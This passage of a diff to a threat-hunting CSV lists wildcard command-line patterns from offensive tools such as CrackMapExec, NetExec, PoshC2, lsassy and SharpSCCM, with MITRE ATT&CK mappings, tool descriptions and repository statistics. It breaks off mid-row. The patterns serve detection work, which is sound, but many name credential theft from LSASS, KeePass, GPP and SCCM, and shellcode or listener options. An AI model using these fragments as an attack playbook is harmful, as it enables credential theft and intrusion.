process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "* --load-shellcode *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "* local class-instances SMS_Authority*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" @@ -1179,11 +1179,11 @@ "* local query * FROM SMS_Authority*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" "* local secrets -m disk*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" "* local secrets -m wmi*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" -"* --local-auth --shares*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -LocalPoshC2ProjectDir *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"* -LocalPoshC2ProjectDir *","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"* -lockless -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"* --loggedon-users*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --local-auth --shares*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -LocalPoshC2ProjectDir *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* -LocalPoshC2ProjectDir *","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* -lockless -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* --loggedon-users*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* --lport 1337 *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* LPORT=4444*","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1043 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* lsa minidump * -o *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" @@ -1193,79 +1193,79 @@ "* lsass.dmp*","offensive_tool_keyword","AD exploitation cheat sheet","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* lsass_creds.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* lsassy -k -d *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* lsassy*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" +"* lsassy*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" "* lu-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -M dfscoerce *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M empire_exec -o LISTENER=http-listener*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -M gpp_autologin*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -M handlekatz *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M keepass_discover *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M keepass_discover*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -M keepass_trigger -o ACTION=ALL USER=*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"* -M dfscoerce *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M empire_exec -o LISTENER=http-listener*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M gpp_autologin*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M handlekatz *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M keepass_discover *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M keepass_discover*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M keepass_trigger -o ACTION=ALL USER=*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "* -m lagentcmd *powershell *","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","6","502","97","2023-08-10T00:42:31Z","2021-11-19T15:58:49Z" -"* -M laps --kdcHost *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M ldap-checker *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M ldap-checker *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -M lsassy *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M MAQ --kdcHost *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M masky *CA=*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M ms17-010 *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M mssql_priv *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M multirdp*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -M nanodump *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M laps --kdcHost *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M ldap-checker *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M ldap-checker *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M lsassy *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M MAQ --kdcHost *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M masky *CA=*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M ms17-010 *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M mssql_priv *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M multirdp*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation 